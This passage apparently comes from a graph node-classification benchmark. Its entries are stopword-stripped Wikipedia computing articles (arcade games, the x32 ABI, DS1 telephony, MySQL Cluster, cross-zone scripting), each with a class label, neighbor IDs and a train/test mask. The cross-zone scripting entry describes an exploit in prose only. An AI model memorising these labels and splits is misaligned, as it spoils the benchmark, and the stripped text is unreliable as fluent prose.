    "text": "Astron_Belt:astron belt astron belt アストロンベルト early laserdisc video game form third-person space combat rail shooter released arcades 1983 sega japan licensed bally midway release united states developed 1982 commonly cited first laserdisc game game unveiling 1982 amoa show chicago marked beginning laserdisc fever videogame industry release japan following year marked first commercial release laserdisc game however release united states delayed due several hardware software bugs time dragon lair beaten public release astron belt however first laserdisc game released europe arcade game available upright cockpit cabinets latter illuminated buttons control panel larger 25 monitor upright used standard 19 vibrating seat astron belt ported msx home system player controls lone spacecraft mission singlehandedly take entire enemy armada enemy fighters ships shoot player mines objects must shot avoided game divided waves end wave command ship must destroyed later waves enemy fighters move shoot aggressively shots accurate waves take place open space others require player battle enemies flying narrow trenches tunnels player timer beginning game unlimited number lives available length timer adjusted machine operator normally 60 seconds timer expires player given limited number additional lives lives lost game ends background videos used game mixture original artwork borrowed material addition scenes created specifically game designers also incorporated footage three science fiction movies battle beyond stars message space astron belt used one four laserdisc players either pioneer ld-v1000 ld-v1001 hitachi vip-9500sg vip-9550 two different versions laser disc also pressed single-sided version pioneer double-sided version sega however discs information may used four players running sega laserdisc hardware game combines pre-rendered laserdisc footage real-time 2d computer graphics plane real-time graphics plane overlaid imitating matting technique crt monitor scans horizontally across screen fed information laserdisc point fed information computer graphics system information coming laserdisc stops creating black mask sprite inserted uses collision detection system laserdisc sprite planes interact frame laserdisc footage coded hit detection spot stored rom memory zilog z80 cpu reads number laserdisc frame checks laserdisc hit spots shots fired player coordinates correspond instructs laserdisc player display explosion sequence sections player must navigate walls walls laserdisc footage also coded use collision detection astron belt responsible starting interactive movie laserdisc craze shown 1982 amoa show one laserdisc games inspired dragon lair sega bally midway released sequel called starblazer also known galaxy ranger 1984 controls similar gameplay astron belt one machine could converted simply changing laserdisc game roms sound board",
    "neighbors": [
      1776,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 8185,
    "label": 7,
    "text": "List_of_game_middleware:list game middleware middleware games piece software integrated game engine handle specialized aspect physics graphics networking ai pathfinding collisions physics animation sound",
    "neighbors": [
      162,
      8071,
      10076,
      2826,
      11306,
      6900,
      8122,
      1916
    ],
    "mask": "Test"
  },
  {
    "node_id": 8186,
    "label": 3,
    "text": "X32_ABI:x32 abi x32 abi application binary interface abi one interfaces linux kernel allows programs take advantage benefits x86-64 instruction set larger number cpu registers better floating-point performance faster position-independent code shared libraries function parameters passed via registers faster syscall instruction using 32-bit pointers thus avoiding overhead 64-bit pointers though x32 abi limits program virtual address space 4 gib also decreases memory footprint program making pointers smaller allow run faster fitting data cache best results testing 181.mcf spec cpu 2000 benchmark x32 abi version 40 faster x86-64 version average x32 5–8 faster spec cpu integer benchmarks compared x86-64 speed advantage x86-64 spec cpu floating-point benchmarks running userspace consists mostly programs compiled ilp32 mode also principal access 64-bit cpu instructions uncommon especially field classic risc chips example solaris operating system sparc x86-64 linux side sparc powerpc linux distributions aurora sparc linux debian also ship ilp32 userspace underlying reason somewhat expensive nature lp64 code like shown x86-64 regard x32 abi extends ilp32-on-64bit concept x86-64 platform several people discussed benefits x86-64 abi 32-bit pointers years since athlon 64 release 2003 notably donald knuth 2008 little publicly visible progress towards implementing mode august 27 2011 hans peter anvin announced linux kernel mailing list h. j. lu working x32-abi day linus torvalds replied concern use 32-bit time values x32 abi could cause problems future use 32-bit time values would cause time values overflow year 2038 following request developers x32 abi changed time values 64-bit presentation linux plumbers conference september 7 2011 covered x32 abi x32 abi merged linux kernel 3.4 release support added gnu c library version 2.16 december 2018 considered deprecate x32 abi happened march 2019",
    "neighbors": [
      4616,
      3082,
      5139,
      10780,
      10785,
      6180,
      8242,
      9266,
      4161,
      8260,
      6213,
      8772,
      8268,
      589,
      593,
      6244,
      5222,
      10856,
      5742,
      4207,
      5244,
      4734,
      11391,
      7812,
      7821,
      4238,
      10382,
      2195,
      2711,
      6808,
      9882,
      1694,
      2723,
      8364,
      10933,
      5815,
      9911,
      5822,
      5824,
      9921,
      1736,
      2762,
      8909,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      7403,
      5356,
      2798,
      1775,
      10482,
      2294,
      8439,
      2809,
      5380,
      4360,
      1291,
      4367,
      792,
      10016,
      2339,
      295,
      823,
      6968,
      7992,
      318,
      3911,
      6988,
      10063,
      5975,
      11095,
      10091,
      7540,
      1399,
      8573,
      1406,
      8066,
      3459,
      900,
      5514,
      4493,
      9621,
      1431,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      1456,
      1972,
      8126,
      9667,
      6087,
      457,
      5065,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      5620,
      2044
    ],
    "mask": "None"
  },
  {
    "node_id": 8187,
    "label": 7,
    "text": "GARUDA:garuda garuda global access resource using distributed architecture india grid computing initiative connecting 17 cities across country 45 participating institutes nationwide project include iits c-dac centers major institutes india garuda collaboration science researchers experimenters nationwide grid computational nodes mass storage scientific instruments aims provide technological advances required enable data compute intensive science 21st century one garuda ’ important challenges strike right balance research daunting task deploying innovation complex scientific engineering endeavors undertaken today department information technology dit government india funded centre development advanced computing c-dac deploy nationwide computational grid garuda proof concept poc phase ended march 2008 17 cities across country connected aim bring “ grid ” networked computing research labs industry april 2008 foundation phase progress aim include users ’ applications providing service oriented architecture improving network stability upgrading grid resources garuda assist accelerate india ’ drive turn substantial research investment tangible economic benefits main monitoring centre also called garuda monitoring management centre set c-dac knowledge park bangalore point whole grid extended even europe monitored managed c-dac young scientists india garuda uses national knowledge network network backbone garuda adopted pragmatic approach using existing grid infrastructure web services technologies deployment grid tools services garuda based judicious mix in-house developed components globus toolkit gt industry grade open source components foundation phase garuda based stable version gt4 resource management scheduling garuda based deployment industry grade schedulers hierarchical architecture cluster level scheduling achieved load leveler aix platforms torque linux clusters garuda portal provides user interface grid resources hides complexity grid users allows submission sequential parallel jobs also provides job accounting facilities problem solving environment pse domains bio-informatics community atmospheric model support entire cycle problem solving specific domains supporting problem formulation algorithm selection numerical simulation solution visualization",
    "neighbors": [
      11353,
      5956
    ],
    "mask": "Train"
  },
  {
    "node_id": 8188,
    "label": 1,
    "text": "Embedded_SQL:embedded sql embedded sql method combining computing power programming language database manipulation capabilities sql embedded sql statements sql statements written inline program source code host language embedded sql statements parsed embedded sql preprocessor replaced host-language calls code library output preprocessor compiled host compiler allows programmers embed sql statements programs written number languages cobol fortran differs sql-derived programming languages n't go discrete preprocessors pl/sql t-sql sql standards committee defined embedded sql standard two steps formalism called module language defined embedded sql standard derived module language sql standard defines embedding sql embedded sql language sql queries embedded referred host language popular host language c. host language c embedded sql example called pro*c oracle sybase database management systems ecpg postgresql database management system sql may also embedded languages like php etc ibm db2 version 9 linux unix windows supports embedded sql c c++ java cobol fortran rexx although support fortran rexx deprecated mimer sql linux openvms windows support embedded sql raima database manager 14.0 supports embedded sql c/c++ sql pl sap sybase ase 15.7 supports embedded sql c cobol part software developer kit sybase sap sybase sql anywhere supports embedded sql c c++ part sql anywhere database management system sql anywhere sap sybase iq supports embedded sql c c++ part sybase iq database management system sybase iq",
    "neighbors": [
      3712,
      5896,
      10511,
      9360,
      11030,
      5399,
      1952,
      428,
      5677,
      9389,
      6831,
      10413,
      6451,
      8502,
      7612,
      8262,
      9926,
      3400,
      8524,
      6483,
      2901,
      8539,
      736,
      10340,
      1780,
      2804,
      3960,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 8189,
    "label": 1,
    "text": "Database_Management_Library:database management library database management library dbl relational database management system rdbms contained c++ programming library dbl source code available terms gnu general public license dbl fully developed within two weeks holiday programming project aims easy simple use c++ programming dbl library becomes integral part application program unlike client–server model database management systems standalone process application program communicates application software uses dbl functionality function calls basic program creates simple database however task must done usually done dbl command-line interface int main database db mydatabase class stores database name tables main functions useful functions use class database class stores table name structure columns table main functions useful functions use class table class stores columns table data stored data file main functions useful functions use class row class stores column value column main functions useful functions use class storage class stores name structure column main functions class stores indexes table main functions useful functions use class index dbl command-line interface program one create database table add columns table besides operations printing",
    "neighbors": [
      4423,
      10921,
      10286,
      2222,
      2804
    ],
    "mask": "Test"
  },
  {
    "node_id": 8190,
    "label": 3,
    "text": "Motorola_Single_Board_Computers:motorola single board computers motorola single board computers motorola production line computer boards embedded systems three different lines mvme68k mvmeppc mvme88k first version board appeared 1988 motorola still makes boards last one mvme3100 netbsd supports module families mvme147 mvme162 mvme167 mvme172 mvme177 openbsd supports mvme141 mvme165 mvme188 mvme197 boards",
    "neighbors": [
      10501,
      7302,
      7305,
      6187,
      8048,
      5235,
      7286
    ],
    "mask": "None"
  },
  {
    "node_id": 8191,
    "label": 7,
    "text": "Cloud_(operating_system):cloud operating system cloud browser-based operating system created good os llc los angeles-based corporation company initially launched linux distribution called gos heavily based ubuntu third incarnation cloud simplified operating system ran web browser providing access variety web-based applications allowed user perform many simple tasks without booting full-scale operating system simplicity cloud could boot seconds operating system designed netbooks mobile internet devices pcs mainly used browse internet cloud user quickly boot main os cloud continues booting main os background combining browser basic operating system allows use cloud computing applications data live run internet instead hard drive cloud installed used together operating systems act standalone operating system used standalone operating system hardware requirements relatively low 2009 cloud officially available built gigabyte m912 touch screen netbook early reviews compared operating system user interface os x noted similarity browser google chrome although actually based modified mozilla firefox browser",
    "neighbors": [
      4236,
      10893,
      911,
      1935,
      4623,
      8592,
      2965,
      5397,
      10646,
      2328,
      4377,
      8986,
      6307,
      9766,
      5159,
      6444,
      7983,
      8495,
      3121,
      5681,
      7352,
      7483,
      2496,
      4289,
      1224,
      8520,
      4429,
      7248,
      1362,
      467,
      9682,
      6367,
      4194,
      11646,
      5732,
      10090,
      3819,
      7660,
      5363,
      2170,
      5499,
      253,
      8446
    ],
    "mask": "Test"
  },
  {
    "node_id": 8192,
    "label": 5,
    "text": "Digital_Signal_1:digital signal 1 digital signal 1 ds1 sometimes ds-1 t-carrier signaling scheme devised bell labs ds1 primary digital telephone standard used united states canada japan able transmit 24 multiplexed voice data calls telephone lines e-carrier used place t-carrier outside united states canada japan south korea ds1 logical bit pattern used physical t1 line practice terms ds1 t1 often used interchangeably t1 refers primary digital telephone carrier system used north america t1 one line type pcm t-carrier hierarchy t1 describes cabling signal type signal regeneration requirements carrier system signal transmitted t1 line referred ds1 signal consists serial bits transmitted rate 1.544 mbps type line code used called alternate mark inversion ami digital signal designation classification digital bit rates digital multiplex hierarchy used transport telephone signals one location another ds-1 communications protocol multiplexing bitstreams 24 telephone calls along two special bits framing bit frame synchronization maintenance-signaling bit transmitted digital circuit called t1 t1 maximum data transmission rate 1.544 megabits per second ds1 telecommunication circuit multiplexes 24 ds0s twenty-four ds0s sampled 8,000 times per second one 8bit pcm sample dso per ds1 frame consume 1.536 mbit/s bandwidth one framing bit adds 8 kbit/s overhead total 1.544 mbit/s calculated follows ds1 full-duplex circuit concurrently transmitting receiving 1.544 mbit/s frame synchronization necessary identify timeslots within 24-channel frame synchronization takes place allocating framing 193rd bit results 8 kbit/s framing data ds1 8-kbit/s channel used transmitting equipment overhead 1.536 mbit/s actually passed user two types framing schemes superframe sf extended superframe esf superframe consists twelve consecutive 193-bit frames whereas extended superframe consists twenty-four consecutive 193-bit frames data due unique bit sequences exchanged framing schemes compatible two types framing sf esf use 8 kbit/s framing channel different ways connectivity refers ability digital carrier carry customer data either end cases connectivity may lost one direction maintained cases terminal equipment i.e. equipment marks endpoints ds1 defines connection quality received framing pattern alarms normally produced receiving terminal equipment framing compromised three defined alarm indication signal states identified legacy color scheme red yellow blue red alarm indicates alarming equipment unable recover framing reliably corruption loss signal produce red alarm connectivity lost toward alarming equipment knowledge connectivity toward far end yellow alarm also known remote alarm indication rai indicates reception data framing pattern reports far end red alarm alarm carried differently sf d4 esf d5 framing sf framed signals user bandwidth manipulated bit two every ds0 channel shall zero resulting loss payload data transmitting yellow alarm undesirable resolved esf framed signals using data link layer repeating 16-bit pattern consisting eight 'ones followed eight 'zeros shall transmitted continuously esf data link may interrupted period exceed 100-ms per interruption types alarms transmitted duration alarm condition least one second blue alarm also known alarm indication signal ais indicates disruption communication path terminal equipment line repeaters dcs signal received intermediary equipment produces unframed all-ones signal receiving equipment displays red alarm sends signal yellow alarm far end framing intermediary interfaces equipment report ais alarm indication signal ais also called ones data framing pattern alarm states also lumped term carrier group alarm cga meaning cga connectivity digital carrier failed result cga condition varies depending equipment function voice equipment typically coerces robbed bits signaling state result far end properly handling condition applying often different state customer equipment connected alarmed equipment simultaneously customer data often coerced 0x7f pattern signifying zero-voltage condition voice equipment data equipment usually passes whatever data may present leaving customer equipment deal condition additionally voice t1s two main types so-called plain inband t1s pri primary rate interface carry voice telephone calls similar fashion pris commonly used call centers provide 23 actual usable telephone lines known b channels bearer also 24th line known channel data carries line signaling information special channel carries caller id cid automatic number identification ani data required channel type usually b bearer channel call handle dialed number identification service dnis info requested channel number request response inband t1s also capable carrying cid ani information configured carrier sending dtmf *ani*dnis* however pris handle efficiently inband t1 seemingly slight advantage due 24 lines available make calls opposed pri 23 channel inband t1 must perform setup tear-down call pri uses 24th channel data channel perform overhead operations 23 channels including cid ani although inband t1 24 channels 23 channel pri set calls faster due dedicated 24th signalling channel channel name t1 came carrier letter assigned technology 1957 digital systems first proposed developed decided skip q r use time division naming system ended letter designated fiber networks destined successors t1 system networks called t1c t2 t3 t4 commercial success disappeared quickly signals would carried systems called ds1 ds2 ds3 ds4 carried t1 infrastructure ds-1 means digital service – level 1 signal sent—as opposed network delivers originally 24 digitized voice channels t1 since practice naming networks ended letter terms t1 ds1 become synonymous encompass plethora different services voice data clear-channel pipes line speed always consistent 1.544 mbit/s payload vary greatly dark fiber dark fiber refers unused fibers available use dark fiber still available sale wholesale market metro wide area links may available markets city pairs dark fiber capacity typically used network operators build sonet dense wavelength division multiplexing dwdm networks usually involving meshes self-healing rings also used end-user enterprises expand ethernet local area networks especially since adoption ieee standards gigabit ethernet 10 gigabit ethernet single-mode fiber running ethernet networks geographically separated buildings practice known wan elimination ds1c digital signal equivalent two digital signal 1 extra bits conform signaling standard 3.152 mbit/s circuit capacities still use today early days digital data transmission 3-mbit/s data rate used link mainframe computers together physical side circuit called t1c t1/e1 protocol implemented line interface unit silicon semiconductor chip contains decoder/encoder loop backs jitter attenuators receivers drivers additionally usually multiple interfaces labeled dual quad octal etc. depending upon number transceiver chip primary purpose retrieve information line i.e. conductive line transverses distance receiving pulses converting signal subjected noise jitter interference clean digital pulse interface chip",
    "neighbors": [
      5505,
      4227,
      6290,
      11286,
      2968,
      3742,
      929,
      11170,
      2860,
      2989,
      2863,
      2994,
      7865,
      5052,
      6205,
      4546,
      7108,
      2894,
      1618,
      3156,
      4692,
      3168,
      2787,
      4963,
      1893,
      2793,
      10100,
      7799
    ],
    "mask": "Train"
  },
  {
    "node_id": 8193,
    "label": 3,
    "text": "The_Maze_of_Galious:maze galious sequel konami msx game knightmare majou densetsu original game overhead vertical scrolling shooter maze galious side-view flick-screen platform game player controls popolon aphrodite entering evil priest galious castle free yet-to-be-born son pampas priest evil clutches able control popolon aphrodite means player switch two characters slightly different abilities example popolon push stones open heavy doors hand aphrodite survives longer water shoot projectiles either character die visit shrine pay resurrection unlike typical platform games characters survive damage hit point bars game several types enemies strengths weaknesses monsters immune frontal attacks vulnerable fire ten different bosses fought defeating boss give player key used unlock doors boss areas in-game saving provided giving player encoded password",
    "neighbors": [
      4357,
      9006,
      7283,
      10931,
      8027
    ],
    "mask": "Test"
  },
  {
    "node_id": 8194,
    "label": 7,
    "text": "Stacki:stacki stacki computer cluster software product company stackiq released open-source software stackiq originally named clustercorp founded 2006 first product commercial version linux distribution called rocks cluster distribution originally based san jose california co-founders included mason katz chief executive tim mcintire 2011 company re-incorporated stackiq moved la jolla district san diego california round venture capital funding april october 2014 raised 6 million located solana beach california august 2016 pervez choudhry replaced mcintire chief executive product called stackiq cluster manager renamed stackiq boss february 2015 stacki works several servers time takes long provision number servers system allows installations via preboot execution environment pxe supports “ servers boot network ” “ servers spreadsheet ” method installations servers installed isolated network stacki tool called insert-ethers run grab machine boots network add stacki commencing installation needed servers installed shared network loading spreadsheet machines install tells stacki ones install stacki uses database manage variables use installation variables defined individual server installation type globally manipulated via spreadsheets command line networking example managed variables machine configured multiple network cards multiple networks varying routes open/closed ports stacki released june 2015 stackiq company acquired teradata june 30 2017 undisclosed amount",
    "neighbors": [
      2834,
      4149,
      2901
    ],
    "mask": "Test"
  },
  {
    "node_id": 8195,
    "label": 7,
    "text": "MySQL_Cluster:mysql cluster mysql cluster technology providing shared-nothing clustering auto-sharding mysql database management system designed provide high availability high throughput low latency allowing near linear scalability mysql cluster implemented ndb ndbcluster storage engine mysql ndb stands network database mysql cluster designed around distributed multi-master acid compliant architecture single point failure mysql cluster uses automatic sharding partitioning scale read write operations commodity hardware accessed via sql non-sql nosql apis internally mysql cluster uses synchronous replication two-phase commit mechanism order guarantee data written multiple nodes upon committing data contrast usually referred mysql replication two copies known replicas data required guarantee availability mysql cluster automatically creates “ node groups ” number replicas data nodes specified user updates synchronously replicated members node group protect data loss support fast failover nodes also possible replicate asynchronously clusters sometimes referred mysql cluster replication geographical replication typically used replicate clusters data centers disaster recovery reduce effects network latency locating data physically closer set users unlike standard mysql replication mysql cluster geographic replication uses optimistic concurrency control concept epochs provide mechanism conflict detection resolution enabling active/active clustering data centers starting mysql cluster 7.2 support synchronous replication data centers supported multi-site clustering feature mysql cluster implemented fully distributed multi-master database ensuring updates made application sql node instantly available nodes accessing cluster data node accept write operations data within mysql cluster ndb tables automatically partitioned across data nodes system done based hashing algorithm based primary key table transparent end application clients connect node cluster queries automatically access correct shards needed satisfy query commit transaction mysql cluster able support cross-shard queries transactions users define partitioning schemes allows developers add “ distribution awareness ” applications partitioning based sub-key common rows accessed high running transactions ensures data used complete transactions localized shard thereby reducing network hops mysql cluster allows datasets larger capacity single machine stored accessed across multiple machines mysql cluster maintains indexed columns distributed memory non-indexed columns also maintained distributed memory maintained disk in-memory page cache storing non-indexed columns disk allows mysql cluster store datasets larger aggregate memory clustered machines mysql cluster writes redo logs disk data changes well check pointing data disk regularly allows cluster consistently recover disk full cluster outage redo logs written asynchronously respect transaction commit small number transactions lost full cluster fails however mitigated using geographic replication multi-site cluster discussed current default asynchronous write delay 2 seconds configurable normal single point failure scenarios result data loss due synchronous data replication within cluster mysql cluster table maintained memory cluster access disk storage write redo records checkpoints writes sequential limited random access patterns involved mysql cluster achieve higher write throughput rates limited disk hardware compared traditional disk-based caching rdbms checkpointing disk in-memory table data disabled per-table basis disk-based persistence n't needed mysql cluster designed single point failure provided cluster set correctly single node system piece hardware fail without entire cluster failing shared disk san required interconnects nodes standard ethernet gigabit ethernet infiniband sci interconnects mysql cluster stores tables data nodes rather mysql server multiple interfaces available access database part commercial mysql cluster cge mysql cluster manager tool designed simplify creation administration mysql cluster cge database automating common management tasks including on-line scaling upgrades backup/restore reconfiguration mysql cluster manager also monitors automatically recovers mysql server application nodes management nodes well mysql cluster data nodes mysql cluster uses three different types nodes processes generally expected node run separate physical host vm cloud instance although common co-locate management nodes mysql servers best practice recommended co-locate nodes within node group single physical host would represent single point failure mysql cluster version numbers longer tied mysql server example recent version mysql cluster 7.5 even though based on/contains server component mysql 5.7 higher versions mysql cluster include features lower versions plus new features older versions longer development currently available versions evaluation purposes possible run mysql cluster single physical server production deployments minimum system requirements 3 x instances hosts configurations follows tips recommendations deploying highly performant production grade clusters found mysql cluster evaluation guide guide optimizing performance mysql cluster database mysql ab acquired technology behind mysql cluster alzato small venture company started ericsson ndb originally designed telecom market high availability high performance requirements mysql cluster based ndb storage engine since integrated mysql product first release mysql 4.1 mysql cluster licensed gplv2 license commercial support available part mysql cluster cge also includes non-open source addons mysql cluster manager mysql enterprise monitor addition mysql enterprise security mysql enterprise audit",
    "neighbors": [
      11136,
      11392,
      10628,
      3462,
      10632,
      10258,
      2456,
      7453,
      1950,
      9503,
      7339,
      7983,
      9010,
      823,
      8379,
      10048,
      6721,
      9285,
      3784,
      5964,
      5198,
      4817,
      7506,
      9687,
      10459,
      6245,
      8295,
      8683,
      5612,
      2413,
      6124,
      7022,
      10737,
      6514,
      3188,
      1142,
      10873,
      2810
    ],
    "mask": "Test"
  },
  {
    "node_id": 8196,
    "label": 2,
    "text": "Alcatel_One_Touch_Fire:alcatel one touch fire alcatel one touch fire one first generation smartphones preinstalled firefox os open-source mobile operating system developed mozilla phone developed marketed alcatel mobile phones lower-cost entry-level smartphone specific latin american european countries brazil chile colombia mexico peru uruguay venezuela latin america germany greece hungary italy montenegro poland serbia europe mobile network operators carried phone include congstar germany cosmote greece movistar chile mexico peru uruguay venezuela t-mobile montenegro macedonia telcel mexico telenor serbia montenegro telecom italia mobile italy vivo brazil one touch fire variation earlier android-based smartphone alcatel one touch t'pop unlike one touch fire one touch t'pop uses arm cortex-a9 cpu powervr sgx531 gpu also incorporates home back push-buttons distinct cosmetics differences one touch fire sold three color schemes mozilla orange apple green pure white two model numbers one touch fire 4012a 4012x support different cellular network standards frequency bands different countries 4012a quadband gsm radio communicate 850 900 1800 1900 mhz umts radio capable 850 1900 2100 mhz communication 4012x umts radio communicates 900 2100 mhz consequently 4012x lower specific absorption rate 4012a 4012x succeeded one touch fire c one touch fire e one touch fire s. 2019 alcatel one touch fire still little resale value worldwide due discontinuation firefox os fared well hardly considered collector item",
    "neighbors": [
      7745,
      10658,
      7492,
      5963,
      1776,
      2259,
      9913,
      1083,
      638
    ],
    "mask": "Test"
  },
  {
    "node_id": 8197,
    "label": 4,
    "text": "Public_computer:public computer public computer public access computer various computers available public areas places public computers may available libraries schools facilities run government public computers share similar hardware software components personal computers however role function public access computer entirely different public access computer used many different untrusted individuals throughout course day computer must locked secure intentional unintentional abuse users typically n't authority install software change settings personal computer contrast typically used single responsible user customize machine behavior preferences public access computers often provided tools pc reservation system regulate access world first public access computer center marin computer center california co-founded david annie fox 1977 see also computer kiosk kiosk special type public computer using software hardware modifications provide services place kiosk example movie ticket kiosk found movie theater kiosks usually secure browser zero access desktop many kiosks may run linux however atms kiosk designed depositing money often run windows xp united states canada almost public libraries computers available use patrons though libraries keep users timed allow others get turns keep library less busy users often allowed print documents created using computers though sometimes small fee u.s. government given money many school boards purchase computers educational applications schools may multiple computer labs contain computers students use usually internet access machines schools put blocking service limit websites students able access include educational resources google addition controlling content students viewing putting blocks also help keep computers safe preventing students downloading malware threats however effectiveness content filtering systems questionable since easily circumvented using proxy websites virtual private networks weak security systems merely knowing ip address intended website enough go school computers often advanced operating system security prevent tech-savvy students inflicting damage i.e windows registry editor task manager etc disabled microsoft windows machines schools advanced tech services may also install locked bios/firmware make kernel-level changes operating system eradicating chances unauthorized activity",
    "neighbors": [
      1515,
      6797,
      7515,
      7380,
      823,
      10392,
      5435,
      1279
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8198,
    "label": 3,
    "text": "GR8BIT:gr8bit gr8bit educational 8-bit computer hardware software platform upon users experiment computer electronics simpler computer architecture compared modern mainstream electronics created eugeny brychkov licensed msx licensing corporation age labs announced 2011 launch msx kit called gr8bit do-it-yourself computer learning purposes licensed msx licensing corporation kit priced 499 includes necessary components assemble working msx2 compatible computer except atx chassis power supply floppy drive hard disk ps/2 keyboard monitor also comes assembly operational manuals supplement compiled vendor community support",
    "neighbors": [
      9932,
      3788,
      11462,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 8199,
    "label": 3,
    "text": "Pac-Mania:pac-mania pac-mania would gain highly-positive critical reception uniqueness gameplay nominated best coin-op conversion year golden joystick awards 1987 although would lose taito operation wolf game would go sell 1,412 arcade cabinets north america end 1987 grossing around 2.82 million 6.22 million adjusted inflation pac-mania would ported several home consoles computers including atari st msx2 sega genesis nintendo entertainment system last published tengen several pac-man namco video game collections would also include game ports wii virtual console ios mobile phones also produced pac-mania isometric maze game player controls pac-man yellow circular creature must eat pellets stage avoiding five colored ghosts blinky pinky inky clyde sue eating large power pellets cause ghosts turn blue flee allowing pac-man eat bonus points send house middle stage clearing stage pellets allow pac-man move next new game ability jump ghosts allowing pac-man evade capture ghosts later areas game introduce two new ghosts green ghost funky steel gray ghost spunky also ability jump pac-man still jump funky impossible jump spunky eating certain number pellets cause bonus items appear middle stage pac-man eat points items increase pac-man movement speed double point values blue ghosts pac-mania arrived 8-bit systems 1988 favourable home conversion appeared commodore 64 conversions designed ported teque software otherwise known peter harrap monty mole shaun hollingworth ex-gremlin games published grandslam entertainment full screen 32-colour commodore amiga version released 1988 highly rated x68000 version acorn archimedes 16-bit atari st conversion ran 55 screen area used 16 colours pac-mania later ported nintendo entertainment system 1990 sega genesis 1991 tengen version unlicensed neither port released japan genesis port outsourced sculptured software recently port atari ste based st version modified take advantage ste features developed entertainment weekly gave game b- game runner-up category best coin-op conversion year golden joystick awards behind operation wolf arcade version pac-mania appeared namco museum volume 5 2001 namco museum release namco museum 50th anniversary namco museum virtual arcade 2001 one games included pac-man collection game boy advance later 2002 arcade version re-released included unlockable bonus pac-man world 2 2007 pac-mania also released namco museum remix pac pal pac n roll super pac-man non-pac-man games re-released 2010 part follow-up compilation namco museum megamix along 17 namco arcade games six remix games five appeared namco museum remix 2010 design pac-man ghosts pac-mania appear pac-man championship edition dx game released app app store ios devices pac-mania also re-released part pac-man arcade party arcade machine 2010 pac-man 30th anniversary february 2014 included pac-man museum playstation 3 xbox 360 windows pc via steam 2018 included pac-man pixel bash arcade cabinet along pac-man different namco games music pac-man park later used pac-man ghostly adventures power theme pac show version pac-man theme along block town music would remixed used super smash bros. nintendo 3ds wii u",
    "neighbors": [
      6797,
      9006,
      10862,
      1776,
      10931,
      6390,
      4311,
      4856,
      3039
    ],
    "mask": "Test"
  },
  {
    "node_id": 8200,
    "label": 4,
    "text": "Cross-zone_scripting:cross-zone scripting cross-zone scripting browser exploit taking advantage vulnerability within zone-based security solution attack allows content scripts unprivileged zones executed permissions privileged zone i.e privilege escalation within client web browser executing script vulnerability could common attack scenario involves two steps first step use cross-zone scripting vulnerability get scripts executed within privileged zone complete attack perform malicious actions computer using insecure activex components type vulnerability exploited silently install various malware spyware remote control software worms onto computers browsing malicious web page four well known zones internet explorer zones explained detail use security zones internet explorer also additional hidden zone local intranet trusted sites local computer usually configured privileged zones cross-zone scripting attacks designed jump internet zone privileged zone type exploit attempts execute code security context local computer zone following html used illustrate naive non-working attempt exploitation explanation html code attempts get attack.gif loaded cache using img src reference script src tag used attempt executing script local computer zone addressing local file cache consider scenario computer considers intranet.example.com part local intranet zone successfully cross zone scripted well-known example 2f bug internet explorer 6 discovered following url executed trusted sites permission listed trusted site",
    "neighbors": [
      8281,
      450,
      5636,
      4198,
      10026,
      10392,
      2041,
      6938,
      7515
    ],
    "mask": "Test"
  },
  {
    "node_id": 8201,
    "label": 1,
    "text": "Object_database:object database object database database management system information represented form objects used object-oriented programming object databases different relational databases table-oriented object-relational databases hybrid approaches object databases considered since early 1980s object-oriented database management systems oodbmss also called odbms object database management system combine database capabilities object-oriented programming language capabilities oodbmss allow object-oriented programmers develop product store objects replicate modify existing objects make new objects within oodbms database integrated programming language programmer maintain consistency within one environment oodbms programming language use model representation relational dbms projects way contrast maintain clearer division database model application usage web-based technology increases implementation intranets extranets companies vested interest oodbmss display complex data using dbms specifically designed store data objects gives advantage companies geared towards multimedia presentation organizations utilize computer-aided design cad object-oriented databases designed work well object-oriented programming languages delphi ruby python javascript perl java c visual basic .net c++ objective-c smalltalk others jade programming languages oodbmss use exactly model object-oriented programming languages object database management systems grew research early mid-1970s intrinsic database management support graph-structured objects term object-oriented database system first appeared around 1985. notable research projects included encore-ob/server brown university exodus university wisconsin–madison iris hewlett-packard ode bell labs orion microelectronics computer technology corporation mcc vodak gmd-ipsi zeitgeist texas instruments orion project published papers efforts kim mcc compiled best papers book published mit press early commercial products included gemstone servio logic name changed gemstone systems gbase graphael vbase ontologic additional commercial products entered market late 1980s mid 1990s included itasca itasca systems jasmine fujitsu marketed computer associates matisse matisse software objectivity/db objectivity inc. objectstore progress software acquired excelon originally object design incorporated ontos ontos inc. name changed ontologic technology merged several companies acquired informix turn acquired ibm poet fastobjects versant acquired poet software versant object database versant corporation voss logic arts jade jade software corporation products remain market joined new open source commercial products intersystems caché object database management systems added concept persistence object programming languages early commercial products integrated various languages gemstone smalltalk gbase lisp vbase cop voss virtual object storage system smalltalk much 1990s c++ dominated commercial object database management market vendors added java late 1990s recently c starting 2004 object databases seen second growth period open source object databases emerged widely affordable easy use entirely written oop languages like smalltalk java c versant db4o db4objects dts/s1 obsidian dynamics perst mcobject available dual open source commercial licensing object databases based persistent programming acquired niche application areas engineering spatial databases telecommunications scientific areas high energy physics molecular biology another group object databases focuses embedded use devices packaged software real-time systems object databases also offer kind query language allowing objects found using declarative programming approach area object query languages integration query navigational interfaces biggest differences products found attempt standardization made odmg object query language oql access data faster object retrieved directly without search following pointers another area variation products way schema database defined general characteristic however programming language database schema use type definitions multimedia applications facilitated class methods associated data responsible correct interpretation many object databases example gemstone voss offer support versioning object viewed set versions also object versions treated objects right object databases also provide systematic support triggers constraints basis active databases efficiency database also greatly improved areas demand massive amounts data one item example banking institution could get user account information provide efficiently extensive information transactions account information entries etc object data management group consortium object database object-relational mapping vendors members academic community interested parties goal create set specifications would allow portable applications store objects database management systems published several versions specification last release odmg 3.0 2001 major object database object-relational mapping vendors claimed conformance odmg java language binding compliance components specification mixed 2001 odmg java language binding submitted java community process basis java data objects specification odmg member companies decided concentrate efforts java data objects specification result odmg disbanded 2001 many object database ideas also absorbed implemented varying degrees object-relational database products 2005 cook rai rosenberger proposed drop standardization efforts introduce additional object-oriented query apis rather use oo programming language i.e. java .net express queries result native queries emerged similarly microsoft announced language integrated query linq dlinq implementation linq september 2005 provide close language-integrated database query capabilities programming languages c vb.net 9 february 2006 object management group omg announced granted right develop new specifications based odmg 